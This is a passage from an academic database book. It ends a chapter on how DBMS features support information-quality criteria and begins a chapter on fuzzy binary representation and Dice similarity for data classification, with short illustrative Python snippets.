First, DBMS provide means to explicitly limit the amount of data returned through SQL extensions such as “FETCH FIRST N ROWS ONLY” in DB2 (for Microsoft SQL Server: “SELECT TOP N ... FROM ...” and for Oracle: “OPTIMIZER_MODE = FIRST_ROWS_N”). With this command the DBMS limits the number of rows returned to the data consumer. The technique improves latency (see below), addresses problems of limited bandwidth, and avoids users being overwhelmed by too much data. Second, commercial DBMS place virtually no limit on the amount of data they can manage. The Winter Corporation (2003) lists some of the largest known database instances by different criteria, such as number of rows, size in bytes, and so forth. According to that survey, the largest databases store close to 100 terabytes of data and up to half a trillion rows. In summary, large DBMS support appropriate amounts of data by providing capabilities to reduce the amount as much as desired and simultaneously allow the amount to be as large as necessary.
Latency and Response Time (New Criteria)
Latency is the amount of time from issuing the query until the first data item reaches the user. Latency is particularly important for end users such as business managers. Instead of waiting for the DBMS to calculate the entire result of a query or to produce all pages of a report, modern DBMS have the ability to “fast-track” first results. Thus, users can browse the first part of a result. Further parts are either calculated on demand (saving execution cost if they are never needed) or calculated in the background (i.e., while displaying first results). The most important technique to ensure good (low) latency is that of pipelined query execution. Data is sent through an execution pipeline, so that calculated results arrive at the user’s application even while base data is still being read (Graefe,
1993; Pirahesh, 1990). All modern DBMS are able to recognize a potential for pipelining in a given query and are able to execute the query in pipelined mode. Developers of applications are able to use certain functions so that their applications also profit from the low latency of the DBMS. For instance, the getNext() function explicitly produces only the next subset of answers. Administrators can use DB2's SQL extension “FETCH FIRST N ROWS ONLY” to achieve low latency and also decrease query execution cost. While latency measures the time until a first part of a response reaches the data consumer, response time measures the delay in seconds between submission of a query by the user and reception of the complete response from the DBMS. Response time is the main and often sole criterion for traditional database optimizers. In consequence, there has been an enormous amount of academic and industrial research to improve the response time of queries even over very large databases, much of which has been implemented in commercial DBMS. For lack of space, we refer the reader to surveys on query optimization for centralized databases (Graefe, 1993) and for distributed databases (Kossmann, 2000). While many of these optimization techniques must be installed and maintained by hand, recent work on autonomic computing lightens the burden on DBMS administrators. Automatic advisors, such as the Design Advisor of IBM DB2 Stinger, recommend optimal settings for many DBMS parameters, for instance regarding the use of indices and the use of materialized views (Zilio, 2004).
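Through the standard Python database API, for example, an application can retrieve a result incrementally instead of waiting for the complete answer; the following sketch uses SQLite purely for illustration, and the table is hypothetical.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE log (id INTEGER PRIMARY KEY, message TEXT)")
conn.executemany("INSERT INTO log (message) VALUES (?)",
                 [("event %d" % i,) for i in range(10000)])

cursor = conn.execute("SELECT id, message FROM log ORDER BY id")
first_page = cursor.fetchmany(20)   # display the first rows immediately...
print(len(first_page))
next_page = cursor.fetchmany(20)    # ...and fetch further rows only on demand
print(next_page[0])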
Representational IQ Criteria
Interpretability
“Interpretability is the extent to which data are in appropriate language and units and the data definitions are clear” (Wang, 1996). Interpretability is highly dependent on the interface that users have to the data. DBMS interfaces have two roles. One
role is to interpret given data using metadata, such as the schema, constraints, etc. The other role of interfaces is to allow users interaction with the data, such as creating new data, reformatting data, and aggregating data. Interpretation of data largely depends on the underlying schema, which can be well or poorly designed. DBMS support good schema design through visual tools, such as Computer Associate’s ERWin Data Modeler. Also, DBMS provide multiple language support to improve interpretability. The main tools around DB2 are available in 15 different languages. Recent developments have given administrators and programmers more flexibility in schema design: Table and attribute names are no longer restricted to eight bytes, and user defined types (UDTs), user-defined functions (UDFs), and table functions allow development of specialized data items. Interfaces for interaction with the data in a DBMS range from highly technical interfaces (SQL Query Language) to somewhat technical interfaces (query- and view-building tools, such as DB2 SQL Assist) to non-technical interfaces for business managers (report generators).
Understandability
“Understandability (or ease of understanding) is the extent to which data are clear without ambiguity and easily comprehended” (Wang, 1996). Thus, understandability measures how well a DBMS presents its data, so that the user is able to comprehend its semantic value. Standard DBMS query interfaces represent data in simple tables, using column names stored in the system catalog. Until several years ago, column names were restricted to eight characters in length, severely limiting the expressivity and thus understandability of the data. This has now changed and developers can give tables and columns more verbose names. Also, many third-party applications specialize in visualizing complex data.
One of the main concerns of DBMS administrators is to maintain efficient query response times for all queries. In particular, administrators are concerned with the optimization of queries (i.e., finding an efficient execution strategy). DB2 provides an advanced visualization tool called Visual Explain, which graphically displays a query execution plan along with table sizes, join algorithms, filter selectivity, and result size. Such visualization improves understanding of the data and of the DBMS's view of the data. Visualization of the query result data itself is not the focus of the DBMS, but rather of applications built on top. In consequence, business managers are rarely exposed to a simple tabular display of data directly from the DBMS, but instead use sophisticated tools that are able to additionally visualize data in other models, such as bar charts that more accurately reflect the business domain.
Representational Consistency
“Representational consistency is the extent to which data are always represented in the same format and are compatible with previous data” (Wang, 1996). Representational consistency from an administrator’s point of view is accomplished through DBMS support of standard data exchange protocols, such as JDBC and ODBC, and standard data exchange formats, such as CSV (comma-separated values) and XML (Extensible Markup Language). These standards, which are supported by all DBMS vendors, allow fairly easy data exchange at the byte level among different data sources. Achieving representational consistency in terms of the structure of the data as reflected in a schema is a far more difficult task. Two main research areas have dealt with the integration of heterogeneously modeled data: schema integration (see for instance Batini, 1986) and schema mapping (see for instance Hernandez, 2002).
While schema integration attempts to generate a new integrated schema from different representations, schema mapping simply represents correspondences among heterogeneous schemas. The correspondences are then interpreted as data transformations that help achieve representational consistency among multiple data sources. Unfortunately, both approaches are not yet well supported in commercial DBMS. However, several prototypical tools with graphical interfaces for schema mapping are under development, such as Clio at IBM Research (Hernandez, 2002) and Rondo (Melnik, 2003). To conclude, achieving representational consistency is an extremely difficult task not yet well supported by DBMS, and research toward semi-automatically solving it is only now underway.
Representational Conciseness
“Representational conciseness is the extent to which data are compactly represented without being overwhelming” (Wang, 1996). Data representation in most modern DBMS follows the relational model, which structures data into relations (tables) storing tuples (records) each having a set of attributes (stored in columns) (Codd, 1970). For many applications this is an intuitive and compact method to model data. In particular, through the process of normalizing tables, the representation can be rendered as compact as possible. On the other hand, many applications have a more hierarchical view of data, so that an XML data model might be preferred. Most modern DBMS have some capability of storing and retrieving XML data, or even producing XML data from a set of tables through the new SQL/XML standard.4 As already argued for the Relevancy criterion, DBMS provide many means for developers to reduce the amount of data to some relevant and concise subset as needed for any particular application. Reduction is achieved by selecting
relevant columns (called projection), filtering relevant rows (called selection), and summarizing data (aggregation).
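A small sketch of these three reduction operations, expressed in SQL and run through SQLite purely for illustration (the table and column names are hypothetical):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE sales (region TEXT, product TEXT, amount REAL)")
conn.executemany("INSERT INTO sales VALUES (?, ?, ?)", [
    ("EU", "widget", 100.0), ("EU", "gadget", 50.0), ("US", "widget", 70.0),
])

# Projection (only region and amount), selection (only widgets),
# and aggregation (one summarized row per region).
query = """
    SELECT region, SUM(amount) AS total
    FROM sales
    WHERE product = 'widget'
    GROUP BY region
"""
print(conn.execute(query).fetchall())  # e.g. [('EU', 100.0), ('US', 70.0)]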
Accessibility IQ Criteria
Accessibility/Availability
“Accessibility is the extent to which data are available or easily and quickly retrievable” (Wang, 1996). Availability of a DBMS is the probability that a feasible query is correctly answered in a given time range. Availability is a technical measure concerning both hardware, software, and their compatibility. Availability and accessibility are crucial features for large scale, mission-critical applications. For example, a DBMS server failure in the middle of a time-sensitive stock transaction or bank transfer could have an immediate effect on the core business. DBMS have invested heavily in technology to achieve high availability. Centralized DBMS running on a single server have advanced in recent years to parallel DBMS and distributed DBMS running on multiple servers possibly distributed worldwide. Distribution opens the possibility of two means to achieve high availability: clustering and replication (Wright, 2003). Both clustering and replication exploit distribution to minimize the risk that DBMS software or hardware introduces as a single point of failure for applications that depend on the DBMS. DBMS clusters exploit features in the operating system on which the DBMS is deployed to automatically react to software or hardware failures. In the event of a failure, the DBMS cluster automatically engages a backup system to take over for the failed component. DBMS cluster technology achieves high availability for an entire DBMS system. It requires specific software and hardware to implement, and places restrictions on the distance and hardware over which it can be deployed. DBMS replication is an alternative technology for high availability. Replication allows an administrator
to control the subset of data to be managed for availability, including what subset of the data to replicate, where to place replicas (including across platforms and over long distances), how to keep them up-to-date, and which replica to use to answer a particular query (Bourbonnais, 2004). DB2 Information Integrator Masala Replication Server, for example, supports multiple source/ target topologies for replication, including 1-tomany, many-to-1, and many-to-many. In addition to high availability features, DBMS provide a number of features to support user accessibility to the data managed by the DBMS. As shown in Figure 1, DBMS provide a number of different interfaces from visual to programming APIs to access data. Most standard DBMS APIs such as ODBC are fairly mature. However, DBMS vendors tend to keep up with current trends and technologies. For example, most DBMS vendors have developed tools to allow administration and user access to DBMS via a Web interface in a browser. Examples include IBM’s DB2 Web Query Tool, Oracle’s Application Server Portal, and Microsoft’s SQL Server Web Data Administrator. In addition to flexibility with regard to interfaces, DBMS also provide features that allow administrators to customize user accessibility to data. Examples of such features include user authentication, object-level privileges, database views, and tools like DB2 Query Patroller that regulate database resource use by user-type. To summarize, DBMS provide a number of built-in availability and accessibility features to provide reliable access to data at the time it is needed by the applications and users that depend on it.
Access Security “Security is the extent to which access to data can be restricted and hence kept secure” (Wang, 1996). Security covers technical aspects, such as cryptography, secure login and so forth, but also includes the possibility of anonymization of the
user and authentication of the DBMS by a trusted organization. Modern DBMS feature several abilities to ensure high security. First, the SQL standard specifies commands to GRANT and REVOKE detailed privileges to individual data objects, such as tables, views, functions, and so forth. Second, DBMS implement sophisticated authentication policies at servers and clients. Finally, DBMS vendors usually provide entire security tool suites ranging from security auditing and monitoring, intrusion detection, to privacy and security management tools.
Customer Support and Documentation (New Criterion)

Customer support is the amount and usefulness of human help provided to users either electronically or personally. Documentation is the amount and usefulness of (electronic) documents describing the DBMS and its functionalities and guiding customers during system deployment and application development. Business managers are usually not confronted with the DBMS themselves, but rather with applications on top of it, for which separate support systems and documentation exist. Administrators and developers: Large installations of DBMS are usually accompanied by agreements on technical support. Support is available at different levels and costs. In addition to this explicit and contractually agreed-upon assistance, all vendors supply a multitude of resources to guide users. Questions to dedicated newsgroups are answered by experts, and context-sensitive help systems are provided within the DBMS and online. Detailed documentation (such as IBM’s Redbooks), tutorials, technical articles, white papers, and reference implementations for common tasks are available for download, and user conferences, such as the International DB2 User Group conference (IDUG), are held regularly throughout the world. In summary, customer support and documentation
can be considered good, in particular for DBMS of large vendors.
FUTURE TRENDS

Many research papers have proposed including data quality dimensions in the data model itself. Typically, extensions to the relational model are proposed. Wang and Madnick (1990) present the Polygen framework, which extends each data value with metadata about its origin. The authors suggest how to extend the operators of the relational algebra, necessary to manipulate and query the data, to accommodate and update the corresponding metadata. In a further extension of their work, they allow for information quality metadata along many dimensions (1995). Again, the relational algebra is adjusted. More recently, Scannapieco (2004) proposed a similar extension to the XML data model. Even more recently, Widom (2005) has reiterated the importance of incorporating information quality aspects and proposed the Trio system, which includes accuracy and lineage information in the relational data model. These and other projects have in common that they are suggestions or, at best, prototypical implementations, and have not yet been adopted by major database management system vendors. A second trend is the development of tools — most notably ETL tools — that are based on DBMS and enhance information quality. Such tools are mentioned throughout the chapter wherever applicable.
CONCLUSION AND DISCUSSION

In conclusion, DBMS are able to uphold the quality-in-quality-out principle postulated in this chapter. Table 1 summarizes our results by listing the most important techniques used to uphold a quality level or to improve information quality for each criterion.
Table 1. Summarizing effects of DBMS on IQ

| IQ Criterion | Intrinsic DBMS capabilities | Extended DBMS Features | Summary |
|---|---|---|---|
| Believability | ACID properties | | % |
| Accuracy | ACID, UDTs, Triggers, checksums | Outlier detection | % |
| Objectivity | Durability, “unbiased” machine | | % |
| Reputation | | Maturity of DBMS, reputation of DBMS | + |
| Value Added | Aggregation | Federation, integration, search, etc. | + |
| Relevancy | Powerful query language | Access to remote data | + |
| Timeliness | Update propagation for materialized views and replication | | |
| Completeness | ACID properties | ETL, Wrappers for heterogeneous data | + |
| Appropriate Amount | Scalability to many terabytes | First N Rows | % |
| Latency/Response Time | Pipelining, advanced query optimization | First N Rows, autonomic computing | + |
| Interpretability | Language support, UDTs, UDFs | Visual schema design, query builders | + |
| Understandability | Metadata restrictions (8 char) | Query plan explanation for administrators, visualization tools on top of DBMS | – |
| Repr. Consistency | JDBC, relational data model | XML, schema integration tools, schema mapping | +/– |
| Repr. Conciseness | Relational data model, normalization, query language | SQL/XML | + |
| Accessibility | Distribution, replication | Web interfaces, portals | + |
| Security | SQL privilege management, authentication | Security auditing | + |
| Support/Documentation | | Phone and email support, tutorials, manuals, conferences, newsgroups | + |

Note: – detrimental; % no effect; + beneficial
We have distinguished features that are intrinsic or fundamental to relational databases from features that are common extensions to RDBMS distributions. The IQ advantages of the first set of features (“intrinsic DBMS capabilities”) come automatically when using carefully and expertly configured databases. The advantages of the second set of features (“extended DBMS features”) are available with most commercial DBMS, but these are tools that must be actively applied in order to achieve high-quality data. In several cases, DBMS are able to improve the quality of the data within. Most notably, DBMS add value to data by providing many advanced value-adding services, such as aggregation, integration, etc., as mentioned by Wiederhold and Genesereth (1997). The powerful SQL query language supported by all DBMS, together with the vendor-specific extensions, allows developers to manipulate data in many ways to enhance its quality: selection and projection allow users to limit data to just the right subset, improving relevancy, appropriate amount, and response time. Tools at the metadata level, such as schema design and integration tools, improve representational consistency and conciseness, understandability, and interpretability. Through their support of the ACID properties, algorithms at the database core ensure that data is not lost or tampered with, upholding criteria such as accuracy, completeness, and believability. The ability of DBMS to integrate data from multiple heterogeneous sources also improves the completeness and relevancy of data. Finally, many usability tools to maintain and use DBMS improve security, support, and accessibility. The only detriment to information quality imposed by the use of DBMS is the potentially limiting expressiveness of the relational model. DBMS data is modeled in relations using a set of attributes, while often a hierarchical or other model is the more natural way of expressing the structure of data. With the recent move of major
DBMS towards support of the XML data model and the XQuery language, this disadvantage is already fading. To summarize, it should come as no surprise that relational databases are able to uphold the quality-in-quality-out criteria described in this chapter. DBMS technology has matured over 20 years of development, and confidence in the reliability and robustness of the DBMS model is reflected in countless mission-critical applications deployed on DBMS systems today. The proactive improvement of information quality, however, must be left to improved processes, specialists, and specialized applications.
REFERENCES

Astrahan, M. M., Blasgen, M. W., Chamberlin, D. D., Gray, J., King III, W. F., Lindsay, B. G., et al. (1979). System R: A relational data base management system. IEEE Computer, 12(5), 42-48.

Batini, C., Lenzerini, M., & Navathe, S. B. (1986). A comparative analysis of methodologies for database schema integration. ACM Computing Surveys, 18(4), 323-364.

Bourbonnais, S., Gogate, V., Haas, L., Horman, R., Malaika, S., Narang, I., et al. (2004). An information infrastructure for the grid providing data virtualization and distribution. IBM Systems Journal, 43(4).

Brass, S. (2002). Semantic errors in SQL. In Proceedings of the GI Workshop Grundlagen von Datenbanken, Fischland, Germany.

Codd, E. F. (1970). A relational model of data for large shared data banks. Communications of the ACM, 13(6), 377-387.

Delone, W. H., & McLean, E. R. (1992). Information systems success: The quest for the dependent variable. Information Systems Research, 3(1), 60-95.
Graefe, G. (1993). Query evaluation techniques for large databases. ACM Computing Surveys, 25(2), 73-170.

Hernández, M. A., Popa, L., Velegrakis, Y., Miller, R. J., Naumann, F., & Ho, H. (2002). Mapping XML and relational schemas with Clio. In Proceedings of the International Conference on Data Engineering (ICDE) (pp. 498-499).

International Standards Organization (ISO). (1999). Information technology — Database Language SQL (Standard No. ISO/IEC 9075:1999).

Josifovski, V., Massmann, S., & Naumann, F. (2003). Super-fast XML Wrapper generation in DB2: A demonstration. In Proceedings of the International Conference on Data Engineering (ICDE) (pp. 756-758).

Josifovski, V., & Schwarz, P. M. (2003). Querying XML data sources in DB2: The XML Wrapper. In Proceedings of the International Conference on Data Engineering (ICDE) (pp. 809-820).

Kossmann, D. (2000). The state of the art in distributed query processing. ACM Computing Surveys, 32(4), 422-469.

Lehner, W., Sidle, R., Pirahesh, H., & Cochrane, H. (2000). Maintenance of automatic summary tables. In Proceedings of the SIGMOD Conference (pp. 512-513).

Melnik, S., Rahm, E., & Bernstein, P. A. (2003). Rondo: A programming platform for generic model management. In Proceedings of the SIGMOD Conference (pp. 193-204).
Naumann, F., Freytag, J. C., & Leser, U. (2004). Completeness of information sources. Information Systems. Elsevier.

Pirahesh, H., Mohan, C., Cheng, J. M., Liu, T. S., & Selinger, P. G. (1990). Parallelism in relational data base systems: Architectural issues and design approaches. In Proceedings of the International Symposium on Databases in Parallel and Distributed Systems (DPDS) (pp. 4-29).

Scannapieco, M., Virgillito, A., Marchetti, C., Mecella, M., & Baldoni, R. (2004). The DaQuinCIS architecture: A platform for exchanging and improving data quality in cooperative information systems. Information Systems, 29(7), 551-582.

Tayi, G. K., & Ballou, D. P. (1998). Examining data quality. Communications of the ACM, 41(2), 54-57.

Wang, R., & Madnick, S. (1990). A Polygen model for heterogeneous database systems: The source tagging perspective. In Proceedings of the 16th VLDB Conference (pp. 519-538), Brisbane, Australia.

Wang, R., Storey, V., & Firth, C. (1995). A framework for analysis of data quality research. IEEE Transactions on Knowledge and Data Engineering (TKDE), 7(4), 623-640.

Wang, R. Y., & Strong, D. M. (1996). Beyond accuracy: What data quality means to data consumers. Journal of Management Information Systems, 12(4), 5-34.

Widom, J. (2005). Trio: A system for integrated management of data, accuracy, and lineage. In 2nd Biennial Conference on Innovative Data Systems Research, Asilomar, CA. Retrieved from http://www-db.cs.wisc.edu/cidr

Wiederhold, G., & Genesereth, M. R. (1997). The conceptual basis for mediation services. IEEE Expert, 12(5), 38-47.

Winter Corporation. (2003). The TopTen program. Retrieved from http://www.wintercorp.com/VLDB/2003_TopTen_Survey/TopTenProgram.html

Wright, M. (2003). An overview of high availability and disaster recovery features for DB2 UDB. IBM Developerworks. Retrieved from http://www.ibm.com/developerworks/db2/library/techarticle/0304wright/0304wright.html
Zilio, D. C., Zuzarte, C., Lightstone, S., Ma, W., Lohman, G. M., Cochrane, R., et al. (2004). Recommending materialized views and indexes with IBM DB2 Design Advisor. In Proceedings of the International Conference on Autonomic Computing (pp. 180-188).
TRADEMARKS

• IBM, DB2, and DB2 Universal Database are trademarks of International Business Machines Corporation in the United States, other countries, or both.
• Microsoft is a trademark of Microsoft Corporation in the United States, other countries, or both.
• Other company, product or service names may be trademarks or service marks of others.

ENDNOTES

1 Oracle Database, www.oracle.com/ip/deploy/database/oracle9i/
2 Microsoft SQL Server, www.microsoft.com/sql/
3 MySql open source database, www.mysql.com
4 SQL/XML standard, http://www.sqlx.org/
This work was previously published in Challenges of Managing Information Quality in Service, edited by L. Al-Hakim, pp. 115-135, copyright 2007 by IGI Publishing (an imprint of IGI Global).
Chapter 7.12
Handling Fuzzy Similarity for Data Classification

Roy Gelbard
Bar-Ilan University, Israel

Avichai Meged
Bar-Ilan University, Israel
INTRODUCTION Representing and consequently processing fuzzy data in standard and binary databases is problematic. The problem is further amplified in binary databases where continuous data is represented by means of discrete ‘1’ and ‘0’ bits. As regards classification, the problem becomes even more acute. In these cases, we may want to group objects based on some fuzzy attributes, but unfortunately, an appropriate fuzzy similarity measure is not always easy to find. The current paper proposes a novel model and measure for representing fuzzy data, which lends itself to both classification and data mining. Classification algorithms and data mining attempt to set up hypotheses regarding the assigning of different objects to groups and classes on the basis of the similarity/distance between them (Estivill-Castro & Yang, 2004) (Lim, Loh & Shih, 2000) (Zhang & Srihari, 2004). Classification
algorithms and data mining are widely used in numerous fields, including social sciences, where observations and questionnaires are used in learning mechanisms of social behavior; marketing, for segmentation and customer profiling; finance, for fraud detection; computer science, for image processing and expert systems applications; medicine, for diagnostics; and many other fields. Classification algorithms and data mining methodologies are based on a procedure that calculates a similarity matrix based on a similarity index between objects and on a grouping technique. Research has shown that a similarity measure based upon binary data representation yields better results than regular similarity indexes (Erlich, Gelbard & Spiegler, 2002) (Gelbard, Goldman & Spiegler, 2007). However, binary representation is currently limited to nominal discrete attributes, suitable for attributes such as gender, marital status, etc. (Zhang & Srihari, 2003). This limits the appeal of the binary approach to data representation for a wider range of data types.
The current research describes a novel approach to binary representation, referred to as Fuzzy Binary Representation. This new approach is suitable for all data types: nominal, ordinal, and continuous. We propose that there is meaning not only in the actual explicit attribute value, but also in its implicit similarity to other possible attribute values. These similarities can either be determined by a problem domain expert or derived automatically by analyzing fuzzy functions that represent the problem domain. The added fuzzy similarity yields improved classification and data mining results. More generally, Fuzzy Binary Representation and the related similarity measures exemplify that a refined and carefully designed handling of data, including the eliciting of domain expertise regarding similarity, may add both value and knowledge to existing databases.
BACKGROUND

Binary Representation

Binary representation creates a storage scheme, wherein data appear in binary form rather than the common numeric and alphanumeric formats. The database is viewed as a two-dimensional matrix that relates entities according to their attribute values. Having the rows represent entities and the columns represent possible values, entries in the matrix are either ‘1’ or ‘0’, indicating that a given entity (e.g., record, object) has or lacks a given value, respectively (Spiegler & Maayan, 1985). In this way, we can have a binary representation for discrete and continuous attributes. Table 1 illustrates the binary representation of a database consisting of five entities with the following two attributes: Marital Status (nominal) and Height (continuous).

• Marital Status, with four values: S (single), M (married), D (divorced), W (widowed).
• Height, with four values: 1.55, 1.56, 1.60, and 1.84.

However, in practice, binary representation is currently limited to nominal discrete attributes only. In the current study, we extend the binary model to include continuous data and fuzzy representation.

Similarity Measures

Similarity/distance measures are essential and at the heart of all classification algorithms. The most commonly-used method for calculating similarity is the Squared Euclidean measure. This measure calculates the distance between two samples as the square root of the sums of all squared distances between their properties (Jain & Dubes, 1988) (Jain, Murty & Flynn, 1999). However, these likelihood-similarity measures are applicable only to ordinal attributes and cannot
be used to classify nominal, discrete, or categorical attributes, since there is no meaning in placing such attribute values in a common Euclidean space. A similarity measure that is applicable to nominal attributes and is used in our research is the Dice index (Dice, 1945). Additional binary similarity measures have been developed and presented (Illingworth, Glaser & Pyle, 1983) (Zhang & Srihari, 2003). Similarities between the different attribute values, as proposed in Zadeh’s (1971) model, are essential in the classification process. In the current study, we use similarities between entities and between an entity’s attribute values to obtain better classification. Following former research (Gelbard & Spiegler, 2000) (Erlich, Gelbard & Spiegler, 2002), the current study also uses the Dice measure.
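The Dice index itself is not restated in the text, so a brief sketch may help: for two equal-length binary vectors it is twice the number of shared ‘1’ bits divided by the total number of ‘1’ bits in the two vectors. The two one-hot entity vectors below are illustrative; they use the Marital Status and Height values of the running example but are not rows copied from the chapter’s tables.

```python
def dice(u, v):
    """Dice similarity between two equal-length binary (0/1) vectors."""
    if len(u) != len(v):
        raise ValueError("vectors must have the same length")
    shared = sum(1 for a, b in zip(u, v) if a == 1 and b == 1)
    ones = sum(u) + sum(v)
    return 2.0 * shared / ones if ones else 0.0

# Two entities in standard binary (one-hot) representation: Marital Status
# (S, M, D, W) followed by Height (1.55, 1.56, 1.60, 1.84) -- illustrative.
single_160 = [1, 0, 0, 0, 0, 0, 1, 0]
single_155 = [1, 0, 0, 0, 1, 0, 0, 0]
print(dice(single_160, single_155))  # 0.5: only the Marital Status bit matches
```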
Fuzzy Logic

The theory of Fuzzy Logic was first introduced by Lotfi Zadeh (Zadeh, 1965). In classical logic, the only possible truth-values are true and false. In fuzzy logic, however, more truth-values are possible beyond the simple true and false. Fuzzy logic, derived from fuzzy set theory, is designed for situations where information is inexact and traditional digital on/off decisions are not possible. Fuzzy sets are an extension of classical set theory and are used in fuzzy logic. In classical set theory, membership of elements in relation to
a set is assessed according to a clear condition: an element either belongs or does not belong to the set. By contrast, fuzzy set theory permits the gradual assessment of the membership of elements in relation to a set; this is described with the aid of a membership function. An element mapped to the value 0 is not included in the given set, a value of 1 describes a fully included member, and all values between 0 and 1 characterize fuzzy members. For example, the continuous variable “Height” may have three membership functions, standing for the “Short”, “Medium”, and “Tall” categories. An object may belong to several categories with different membership degrees; for example, a height of 180 cm may belong to both the “Medium” and “Tall” categories, with membership degrees expressed in the range [0,1]. The membership degrees are returned by the membership functions. We can say that a man whose height is 180 cm is “slightly medium” and a man whose height is 200 cm is “perfectly tall”. Different membership functions might produce different membership degrees. Having several possibilities for membership functions is part of the theoretical and practical drawbacks of Zadeh’s model. There is no “right way” to determine the right membership functions (Mitaim & Kosko, 2001). Thus, a membership function may be considered arbitrary and subjective. In the current work, we make use of membership functions to develop the enhanced similarity calculation for use in the classification of fuzzy data.
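To make the Height example concrete, the sketch below defines three hypothetical membership functions for the Short, Medium, and Tall categories and evaluates them for heights of 180 cm and 200 cm. The breakpoints are assumptions chosen only for illustration; as noted above, there is no single “right” choice of membership functions.

```python
def clamp01(x):
    return max(0.0, min(1.0, x))

# Hypothetical membership functions for Height in cm (assumed shapes).
def short(h):
    return clamp01((170 - h) / 15)                        # fully Short below 155 cm

def medium(h):
    return clamp01(min((h - 155) / 15, (190 - h) / 15))   # peak around 170-175 cm

def tall(h):
    return clamp01((h - 175) / 15)                        # fully Tall above 190 cm

for h in (180, 200):
    print(h, {"Short": round(short(h), 2),
              "Medium": round(medium(h), 2),
              "Tall": round(tall(h), 2)})
# 180 cm belongs partly to Medium and partly to Tall; 200 cm is fully Tall.
```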
Table 2. Fuzzy similarity matrixes of the marital status and height attributes
FUZZY SIMILARITY REPRESENTATION

Standard Binary Representation exhibits data integrity in that it is precise and preserves data accuracy without either loss of information or rounding of any value. The mutual exclusiveness assumption, however, causes the “isolation” of each value. This is acceptable for handling discrete data values. However, in dealing with a continuous attribute such as Height, we would like to capture the fact that a height of 1.55 is closer to 1.56 than to 1.60. When converting such values into a mutually exclusive binary representation (Table 1), we lose these basic numerical relations. The similarity between any pair of entities with different attribute values is always 0, no matter how similar the attribute values are. This drawback makes the standard binary representation unattractive for representing and handling continuous data types. Similarity between attribute values is also needed for nominal and ordinal data. For example, the color “red” (nominal value) is more similar to the color “purple” than it is to the color “yellow”.
Table 3. Fuzzy similarity table
Table 4. Fuzzy binary representation table
In ranking (questionnaires), a satisfaction rank of “1” (ordinal variable) might be closer to the “2” rank than to the “5” rank. These similarity “intuitions” are of paramount importance in classification, and their absence may cause inaccuracies in classification results. The following sections present a model that adds relative similarity values to the data representation. This serves to empower the binary representation to better handle both continuous and fuzzy data and improves classification results for all attribute types.
Model for Fuzzy Similarity Representation In standard binary representation, each attribute (which may have several values, e.g., color: red, blue, green, etc.) is a vector of bits where only one bit is set to “1” and all others are set to “0”. The “1” bit stands for the actual value of the attribute. In the Fuzzy Binary Representation, the zero bits are replaced by relative similarity values.
The Fuzzy Binary Representation is viewed as a two-dimensional matrix that relates entities according to their attribute values. With the rows representing entities and the columns representing possible values, entries in the matrix are fuzzy numbers in the range [0,1], indicating the degree of similarity of a specific attribute value to the actual one: ‘1’ means full similarity to the actual value (this is the actual value), ‘0’ means no similarity at all, and all other values mean partial similarity. The following example illustrates how the Fuzzy Binary Representation is created. Let us assume we have a database of five entities and two attributes represented in a binary representation, as illustrated in Table 1. The fuzzy similarities between all attribute values are calculated (the next section describes the calculation process) and represented in a two-dimensional “Fuzzy Similarity Matrix”, wherein rows and columns stand for the different attribute values, and the matrix cells contain the fuzzy similarity between the value pairs. The Fuzzy Similarity Matrix is symmetrical. Table 2 illustrates fuzzy similarity matrixes for the Marital Status and Height attributes. The Marital Status similarity matrix shows that the similarity between Single and Widowed is “high” (0.8), while there is no similarity between Single and Married (0). The Height similarity matrix shows that the similarity between 1.56 and 1.60 is 0.8 (“high” similarity), while the similarity between 1.55 and 1.84 is 0 (not similar at all). These similarity matrixes can be calculated automatically, as is explained in the next section. Now, the zero values in the binary representation (Table 1) are replaced by the appropriate similarity values (Table 2). For example, in Table 1, we replace the zero bit that stands for Height 1.55 of the first entity with the fuzzy similarity between 1.55 and 1.60 (the actual attribute value), as indicated in the Height fuzzy similarity matrix (0.7). Table 3 illustrates the fuzzy representation obtained after such replacements. It should be noted that the similarities indicated
in the fuzzy similarity table relate to the similarity between the actual value of the attribute (e.g., 1.60 in entity 1) and the other attribute values (e.g., 1.55, 1.56, and 1.84). Next, the fuzzy similarities, presented in decimal form, are converted into a binary format – the Fuzzy Binary Representation. The conversion should allow the use of similarity indexes such as Dice. To meet this requirement, each similarity value is represented by N binary bits, where N is determined by the required precision. For one-tenth precision, 10 binary bits are needed; for one-hundredth precision, 100 binary bits are needed. For ten-bit precision, the fuzzy similarity “0” is represented by ten ‘0’s, the fuzzy similarity “0.1” is represented by nine ‘0’s followed by one ‘1’, the fuzzy similarity “0.2” is represented by eight ‘0’s followed by two ‘1’s, and so on, up to the fuzzy similarity “1”, which is represented by ten ‘1’s. Table 4 illustrates the conversion from the fuzzy representation (Table 3) to the fuzzy binary representation. The Fuzzy Binary Representation illustrated in Table 4 is suitable for all data types (discrete and continuous) and, with the new knowledge (fuzzy similarity values) it contains, better classification is expected. The following section describes the process for the similarity calculations necessary for this type of Fuzzy Binary Representation.
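The encoding just described can be sketched in a few lines of Python. The ten-bit expansion follows the description above (a similarity of 0.2 becomes eight ‘0’s followed by two ‘1’s). The sample similarity row only partly comes from the chapter’s example (the 0.7, 0.8, and 1.0 values); the similarity between 1.60 and 1.84 is an illustrative assumption.

```python
def to_fuzzy_bits(similarity, precision=10):
    """Expand a similarity in [0, 1] into `precision` bits: k trailing '1's
    for a similarity of k / precision, preceded by zeros."""
    ones = round(similarity * precision)
    return [0] * (precision - ones) + [1] * ones

def encode_entity(similarity_row, precision=10):
    """Fuzzy binary representation of one attribute of one entity.

    `similarity_row` holds, for every possible attribute value, its fuzzy
    similarity to the entity's actual value (1.0 for the actual value)."""
    bits = []
    for s in similarity_row:
        bits.extend(to_fuzzy_bits(s, precision))
    return bits

# Height attribute of entity 1 (actual value 1.60): similarities to
# 1.55, 1.56, 1.60, 1.84. The 0.7, 0.8, and 1.0 values come from the text;
# the last value (1.60 vs. 1.84) is an illustrative assumption.
row = [0.7, 0.8, 1.0, 0.0]
print(encode_entity(row))
```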
Fuzzy Similarity Calculation Similarity calculation between the different attribute values is not a precise science, i.e., there is no one way to calculate it, just as there is no one way to develop membership functions in the Fuzzy Logic world. We suggest determining similarities according to the attribute type. A domain expert should evaluate similarity for nominal attributes like “Marital Status”. For example, Single, Divorced and Widowed are considered “one person”, while Married is considered as “two people”. There-
Table 5. Entities similarity
